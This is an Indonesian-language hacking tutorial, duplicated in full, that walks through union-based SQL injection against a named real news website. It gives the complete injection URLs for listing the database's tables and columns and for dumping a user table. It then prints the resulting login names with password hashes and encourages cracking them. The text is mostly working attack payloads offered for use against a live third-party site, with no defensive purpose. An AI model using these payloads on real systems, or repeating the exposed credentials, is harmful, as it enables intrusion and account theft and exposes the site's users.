SQL Injection
[x]
otree kemaren kita udah belajar gimana "Mendeteksi SQL Injection Vulnerability"
sekarang gw bakal buat tutor gimana ngeluarin table, column dan informasi yang ada didalamnya
[x]
contoh target kita kali ini dari dalam negeri ajah ya... :)
http://www.solusisehat.net/berita.php?id=227
keluarin magic numbernya
http://www.solusisehat.net/berita.php?id=-227 union select 1,2,3,4,5,6,7--
angka2 yang keluar adalah 2, 3 dan 5 <-- thats our magic number sekarang coba kita liat versi, database dan user dari target http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,version(),database(),4,user(),6,7-- nah udah keliatankan versi, nama database sama usernya? ternyata versi 5 euy... :) sekarang kita liat table2 yang ada didalam databasenya disini gw make command information_schema untuk ngeluarin table sama columnnya. http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,group_concat(table_name),database(),4,user(),6,7%20from%20information_schema.tables%20where%20table_schema=database()-- command yang gw pake untuk ngeluarin table adalah group_concat(table_name) from information_schema.tables where table_schema=database() masukkan command group_concat(table_name) pada salah satu angka yang udah dikeluarin sebelumnya kemudian command from information_schema.tables where table_schema=database() pada akhir angkanya nah keliatan semua table yang ada dalam databasenya kan? disini kita hanya akan mencari loginnya ajah ya... diantara table2 yang keluar disitu ada table ssc_user, kita akan ngeluarin column yang ada didalam table ssc_user sebelumnya kita konvert table ssc_user menjadi hexa dulu 7373635f75736572 http://www.paulschou.com/tools/xlate/ <-- konvertnya disini
lalu kita keluarin columnnya
http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,group_concat(column_name),database(),4,user(),6,7%20from%20information_schema.columns%20where%20table_name=0x7373635f75736572--
command yang gw pake untuk ngeluarin column adalah group_concat(column_name) from information_schema.columns where table_name=[nama table]
[nama table] disini adalah ssc_user yang sudah kita konvert menjadi hexa yaitu 7373635f75736572
group_concat(column_name) from information_schema.columns where table_name=0x7373635f75736572
nah disini kita bisa liat column yang ada dalam table ssc_user
sekarang kita akan ngeluarin informasi dari column nama_login dan sandi
http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,group_concat(nama_login,0x3a,sandi),3,4,5,6,%207%20from%20ssc_user--
admin:2fbd2ef919d06770,ginung:2350538419934368,Ardi:0f5219dc11e0f77a,yesi:7b10fc7008fadabc,noviana:533e8d92566a1adc
sekarang keliatan semua informasi yang ada dalam column nama_login dan sandi kan?
tinggal dicrack ajah deh xixixi.. :)
[x]
google.com
greetz MainHack BrotherHood
[x]
otree kemaren kita udah belajar gimana "Mendeteksi SQL Injection Vulnerability"
sekarang gw bakal buat tutor gimana ngeluarin table, column dan informasi yang ada didalamnya
[x]
contoh target kita kali ini dari dalam negeri ajah ya... :)
http://www.solusisehat.net/berita.php?id=227
keluarin magic numbernya
http://www.solusisehat.net/berita.php?id=-227 union select 1,2,3,4,5,6,7--
angka2 yang keluar adalah 2, 3 dan 5 <-- thats our magic number sekarang coba kita liat versi, database dan user dari target http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,version(),database(),4,user(),6,7-- nah udah keliatankan versi, nama database sama usernya? ternyata versi 5 euy... :) sekarang kita liat table2 yang ada didalam databasenya disini gw make command information_schema untuk ngeluarin table sama columnnya. http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,group_concat(table_name),database(),4,user(),6,7%20from%20information_schema.tables%20where%20table_schema=database()-- command yang gw pake untuk ngeluarin table adalah group_concat(table_name) from information_schema.tables where table_schema=database() masukkan command group_concat(table_name) pada salah satu angka yang udah dikeluarin sebelumnya kemudian command from information_schema.tables where table_schema=database() pada akhir angkanya nah keliatan semua table yang ada dalam databasenya kan? disini kita hanya akan mencari loginnya ajah ya... diantara table2 yang keluar disitu ada table ssc_user, kita akan ngeluarin column yang ada didalam table ssc_user sebelumnya kita konvert table ssc_user menjadi hexa dulu 7373635f75736572 http://www.paulschou.com/tools/xlate/ <-- konvertnya disini
lalu kita keluarin columnnya
http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,group_concat(column_name),database(),4,user(),6,7%20from%20information_schema.columns%20where%20table_name=0x7373635f75736572--
command yang gw pake untuk ngeluarin column adalah group_concat(column_name) from information_schema.columns where table_name=[nama table]
[nama table] disini adalah ssc_user yang sudah kita konvert menjadi hexa yaitu 7373635f75736572
group_concat(column_name) from information_schema.columns where table_name=0x7373635f75736572
nah disini kita bisa liat column yang ada dalam table ssc_user
sekarang kita akan ngeluarin informasi dari column nama_login dan sandi
http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,group_concat(nama_login,0x3a,sandi),3,4,5,6,%207%20from%20ssc_user--
admin:2fbd2ef919d06770,ginung:2350538419934368,Ardi:0f5219dc11e0f77a,yesi:7b10fc7008fadabc,noviana:533e8d92566a1adc
sekarang keliatan semua informasi yang ada dalam column nama_login dan sandi kan?
tinggal dicrack ajah deh xixixi.. :)
[x]
google.com
greetz MainHack BrotherHood
[x]